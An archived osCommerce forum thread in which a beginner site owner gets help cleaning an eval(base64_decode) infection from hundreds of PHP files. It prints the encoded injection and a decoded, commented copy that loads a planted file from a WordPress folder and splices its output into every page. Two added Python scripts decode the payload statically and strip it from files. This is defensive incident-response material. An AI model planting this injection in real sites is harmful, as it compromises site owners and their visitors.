Archived

This topic is now archived and is closed to further replies.

craftyscrapper

HELP PLEASE Malicious Code /**/eval(base64_decode('aWYoZn

According to my server, the code is in 975 of my files, PHP ones. I have tried to delete the code, however I do not know if I am doing it right, and, after about 30 or so, wondered if there is another way and whether it will work. I do not have a back up that is not infected. My so-called web developer is nowhere to be found. I am not good with computers and would consider myself a true beginner with code, development etc. I cannot follow the instructions in the knowledge base regarding permissions etc (some are 777, some are 644 etc). My osCommerce is v2.2 RCa and I do not understand how to upgrade either. My server has helped as much as they will and cannot help me anymore. Here is the code:

<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9qb3JkYW5hZy9wdWJsaWNfaHRtbC9ibG9nL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvcGx1Z2lucy9pbmxpbmVwb3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3N0eWxlLmNzcy5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9qb3JkYW5hZy9wdWJsaWNfaHRtbC9ibG9nL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvcGx1Z2lucy9pbmxpbmVwb3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3N0eWxl ...'));

I took out the question mark and shift period so it is hopefully not viral now.

Any help would be appreciated!


Read this: eval(base64_decode Hack

Visit the link below:

How to Secure Your Site

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 


Jordana,

 

Your version of osCommerce CAN be very secure, provided you make the necessary patches and contribution additions, so there is no reason to upgrade at this time. However, since no security was in place, you are now hacked and have the tedious task of cleaning the site and then securing it. Since you are a self-proclaimed 'newbie', I would suggest that you perhaps find someone to do the necessary cleansing and updating.

 

Once that is complete, I would then suggest you MAKE A CLEAN BACKUP of your website.

 

 

Chris



 

See my Profile to learn more about add ons, templates, support plans and custom coding (click here)


Hi, thanks for the reply. As stated, I do not have a back up that is not infected. If I just delete all my PHP files, I do not know how to download new ones to my site (a true beginner). I tried copying and pasting the first line of the code into the web site and did not get any result, and so I emailed them; this is their answer:

 

Hi there,

 

It's hard to say for sure just from that snippet, but it looks like you're working with PHP code.

 

One common thing PHP template developers do is 'obfuscate' the code they sell so that it's harder for other developers to edit or reverse engineer. Fair enough - they make a living selling the code they wrote.

 

Since your site uses this code, you only have a few options as far as I can see:

* Contact your original developer and get them to make the changes. I realise this is proving difficult for you.

* Contact the author of that code (likely different from the developer you hired) and see if you can work with them to get the changes you need made.

* Try working around the problem so you don't need whatever is in the obfuscated code.

 

While technically it's possible to reverse-engineer the obfuscated code (it usually goes beyond just base64 encoding), it's not an easy process, and the original developer put it in place to protect his livelihood, so I'm afraid I can't help you there.

 

Best of luck with whatever approach you choose.

 

So now I am even more confused. I had read this before and tried to follow the directions, but as stated above this is what I got. It did not help me. Is there somewhere I can go and get step by step instructions that are dummy proof? Thanks for your prompt reply.


I decoded it:

// Runs only once per request (the sh_no guard) and only where output buffering is available
if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){
 $GLOBALS['sh_no']=1;
 // Pulls in the dropped file hidden in the WordPress tree; it is expected to define gml()
 if(file_exists('/home/jordanag/public_html/blog/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php')){
   include_once('/home/jordanag/public_html/blog/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php');
   if(function_exists('gml')&&!function_exists('dgobh')){
     // Fallback gzdecode() for PHP builds that lack one: walk the gzip header flags, then inflate
     if(!function_exists('gzdecode')){
       function gzdecode($R20FD65E9C7406034FADC682F06732868){
         $R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1)); // FLG byte
         $R60169CD1C47B7A7A85AB44F884635E41=10; // fixed gzip header length
         $R0D54236DA20594EC13FC81B209733931=0;
         if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){ // FEXTRA
           $R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));
           $R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];
           $R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;
         }
         if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){ // FNAME, NUL-terminated
           $R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
         }
         if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){ // FCOMMENT, NUL-terminated
           $R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
         }
         if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){ // FHCRC
           $R60169CD1C47B7A7A85AB44F884635E41+=2;
         }
         $RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));
         if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){
           $RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868; // not gzip: pass through as-is
         }
         return $RC4A5B5E310ED4C323E04D72AFAE39F53;
       }
     }
     // Output-buffer callback: decompress the finished page, then splice the output of gml() right after <body>
     function dgobh($RDA3E61414E50AEE968132F03D265E0CF){
       Header('Content-Encoding: none'); // the buffer is sent uncompressed after the splice
       $R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);
       if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){
         return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);
       }else{
         return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90; // no <body>: prepend instead
       }
     }
     // Every page rendered by this request now passes through dgobh()
     ob_start('dgobh');
   }
 }
}

It gives you a location of an evil file:

 

/blog/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php

 

In a Wordpress folder, correct?

:unsure:

 

Maybe the Wordpress part of the site is insecure (and the osC part may be as well).

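Decoding the injected string the way it was done above can be automated, and doing it statically means the payload is never executed. The following is an added example in Python (not code from the thread, from osCommerce or from WordPress): it finds every eval(base64_decode('...')) in a PHP source, base64-decodes the payload, and lists the file paths the decoded code checks or includes, so the dropped file can be located. The sample PHP source, the path it references and the function names (triage and friends) are this example's own constructions.

```python
"""Triage an eval(base64_decode(...)) injection statically, without executing it.

Added example for this thread (not code from the forum, osCommerce or WordPress).
The payload and paths below are constructed sample data.
"""
import base64
import re

# The injected construct: eval(base64_decode('<base64 text>'))
EVAL_B64_RE = re.compile(
    r"eval\(\s*base64_decode\(\s*'([A-Za-z0-9+/=]+)'\s*\)\s*\)"
)

# String arguments of file-touching calls inside the decoded payload
PATH_RE = re.compile(
    r"(?:file_exists|include_once|include|require_once|require|fopen|file_get_contents)"
    r"\(\s*'([^']+)'\s*\)"
)


def extract_payloads(php_source: str) -> list:
    """Return every payload found in php_source, base64-decoded but never run."""
    payloads = []
    for match in EVAL_B64_RE.finditer(php_source):
        try:
            raw = base64.b64decode(match.group(1), validate=True)
        except ValueError:
            continue  # not valid base64; leave it for manual review
        payloads.append(raw.decode("utf-8", errors="replace"))
    return payloads


def referenced_paths(decoded_payload: str) -> list:
    """Return the distinct file paths the payload checks, includes or opens."""
    paths = []
    for path in PATH_RE.findall(decoded_payload):
        if path not in paths:
            paths.append(path)
    return paths


def triage(php_source: str) -> dict:
    """Summarise what the injected code would do, from the decoded text alone."""
    payloads = extract_payloads(php_source)
    paths = []
    for payload in payloads:
        for path in referenced_paths(payload):
            if path not in paths:
                paths.append(path)
    return {
        "payload_count": len(payloads),
        # an output-buffer callback is how this family rewrites every page
        "uses_ob_start": any("ob_start" in p for p in payloads),
        # a second eval/base64 layer means the decode has to be repeated
        "nested_eval": any("eval(" in p or "base64_decode(" in p for p in payloads),
        "paths": paths,
    }


# Constructed sample: a payload shaped like the one decoded in the thread,
# pointing at a made-up path.
SAMPLE_DECODED = (
    "if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;"
    "if(file_exists('/home/example/public_html/blog/style.css.php')){"
    "include_once('/home/example/public_html/blog/style.css.php');ob_start('dgobh');}}"
)
SAMPLE_PHP = (
    "<? /**/eval(base64_decode('"
    + base64.b64encode(SAMPLE_DECODED.encode()).decode()
    + "'));?>\n<?php\n// legitimate file body follows\n"
)

if __name__ == "__main__":
    report = triage(SAMPLE_PHP)
    for key, value in report.items():
        print(f"{key}: {value}")
```

On a real file, read its contents and pass them to triage(); the decoded payloads are worth keeping as an incident record for the host, but the reported paths are what matter for the clean-up, since the dropped file they point at has to go along with the injected lines. If nested_eval is true, run extract_payloads() again on the decoded text until no further layer appears.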

AHHHH yes, Wordpress HACK is still around. Many sites have fallen to it.

Chris



Yes Jim,

My WordPress was also infected. The file you decoded is in my cPanel, I assume; should I delete it or change it somehow? Remember I do not have a healthy back up. When I spoke to the person who initially did my WordPress for me, she did not know why I had lost all admin privs and suggested I start over, and she never had back ups nor explained how to back up. The reason I say this is I now know how important back ups are; my host went in the "back end" and retrieved my admin controls, then I did back it up, and now due to bandwidth over-use I just get blank pages on both my osCommerce and WordPress. Needless to say I no longer work with the same WordPress developer. OK, I vented. I am trying to learn what to do myself and further my understanding, so should I delete the file? Thanks, Jordana


Honestly not meaning to be rude, crude or obnoxious....

:blush:

 

It's a malicious file planted on your site by a hacker.

 

What do you think you should do?

:unsure:



Thanks for the laugh, I guess it sounds stupid; if I had a broken leg I would know to go to a doctor!!! I am frustrated by all this, so I appreciate the laugh. It is a learning process, so I will delete it. I am actually amazed I found it on my cPanel. Any help is appreciated, thanks Jim.


Thanks for your input. I have to go to the staff Xmas party but I will be back to work on this more tomorrow (Saturday). I do appreciate any and all input. Thanks Jim and Chris.


This clean up script should help to automate removing the malware from all files:

 

blog.sucuri.net/2010/05/simple-cleanup-solution-for-the-latest-wordpress-hack.html

 

It was a common hack on Wordpress spread on many shared hosting providers (godaddy, bluehost, etc).


I am cleaning my site, after paying more for bandwidth... it came back after a warning that I was over my bandwidth. Now I am going through my files and deleting the eval code, as well as having deleted the infected file that Germ suggested. It seems I am doing something right, because my site is up; it only showed an error on specific lines, and I went into the file manager in cPanel and corrected the line (I initially did not delete the ?) on line 1. So now I am getting this error message:

Warning: file(includes/spiders.txt) [function.file]: failed to open stream: No such file or directory in /home/jordanag/public_html/includes/application_top.php on line 178

 

I have no idea what this means; I may have deleted the spiders.txt file. Can someone explain what a spiders.txt file is and a stream, and what do I do now? Remember I am a true beginner. Thanks for all the help; I figure I cannot make it more of a mess than it is already. Jordana

Oh yeah, this one too:

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/jordanag/public_html/index.php:2) in /home/jordanag/public_html/includes/functions/sessions.php on line 103

 

Thanks

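The clean-up that the Sucuri link above automates and the "headers already sent ... output started at index.php:2" warning in the last post come down to the same thing: the injected statement sits on line 1 of each PHP file, and anything left in front of the real <?php after a manual edit (a stray character, a blank line) is sent to the browser before the session code runs. The following is an added example in Python (not the Sucuri script and not osCommerce code): it strips a leading <? /**/eval(base64_decode('...'));?> statement from every .php file under a directory, removes whitespace left in front of the real opening tag, and keeps a copy of each original beside it. It goes slightly beyond the case in the thread by also accepting a <?php open tag and a byte-order mark. The .infected.bak suffix, the sample file contents and the function names are this example's own; the base64 sample is constructed and harmless.

```python
"""Remove a leading eval(base64_decode(...)) injection from every PHP file under a directory.

Added example for this thread (not the Sucuri script, not osCommerce code). It assumes
the injection is a single statement at the very top of each file, as in the thread.
"""
import base64
import re
import tempfile
from pathlib import Path

# The injected statement: optional BOM/whitespace, '<?' or '<?php', the /**/ marker,
# eval(base64_decode('...')); and the close tag with its line break.
INJECTION_RE = re.compile(
    r"\A[\ufeff\s]*<\?(?:php)?\s*/\*\*/\s*"
    r"eval\(\s*base64_decode\(\s*'[A-Za-z0-9+/=]+'\s*\)\s*\)\s*;\s*\?>[ \t]*\r?\n?"
)


def clean_source(src: str):
    """Return (cleaned_source, changed). The payload is never decoded or executed."""
    match = INJECTION_RE.match(src)
    if not match:
        return src, False
    rest = src[match.end():]
    # Anything before the real '<?php', even a blank line, is output to the browser,
    # which is what produces 'headers already sent' errors later in the request.
    stripped = rest.lstrip("\ufeff \t\r\n")
    if stripped.startswith("<?"):
        rest = stripped
    return rest, True


def clean_tree(root, backup_suffix=".infected.bak"):
    """Clean every *.php under root, keeping a copy of each changed original.

    Returns the sorted list of files that were modified."""
    changed_files = []
    for path in Path(root).rglob("*.php"):
        src = path.read_text(encoding="utf-8", errors="surrogateescape")
        new_src, changed = clean_source(src)
        if changed:
            backup = path.with_name(path.name + backup_suffix)
            backup.write_text(src, encoding="utf-8", errors="surrogateescape")
            path.write_text(new_src, encoding="utf-8", errors="surrogateescape")
            changed_files.append(str(path))
    return sorted(changed_files)


# Constructed sample data for the demo (the base64 is a harmless echo statement).
SAMPLE_B64 = base64.b64encode(b"echo 'constructed sample';").decode()
INFECTED = "<? /**/eval(base64_decode('" + SAMPLE_B64 + "'));?>\n<?php\n// real file body\n"
CLEAN = "<?php\n// untouched file\n"


def demo():
    """Build a throwaway tree with one infected and one clean file, clean it, and
    return (number of files changed, new contents of the infected file)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "includes").mkdir()
        (root / "index.php").write_text(INFECTED, encoding="utf-8")
        (root / "includes" / "application_top.php").write_text(CLEAN, encoding="utf-8")
        changed = clean_tree(root)
        cleaned_index = (root / "index.php").read_text(encoding="utf-8")
        return len(changed), cleaned_index


if __name__ == "__main__":
    count, text = demo()
    print(count, "file(s) cleaned; index.php now starts with:", text.splitlines()[0])
```

Run it against a copy of the site first; clean_tree() returns the list of files it touched, and the .infected.bak copies let any file be compared or restored. The separate warning about includes/spiders.txt is unrelated to the malware: osCommerce reads that file (its list of search-engine user agents) from application_top.php, so if it went missing during the clean-up it has to be put back from an osCommerce package of the same version.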
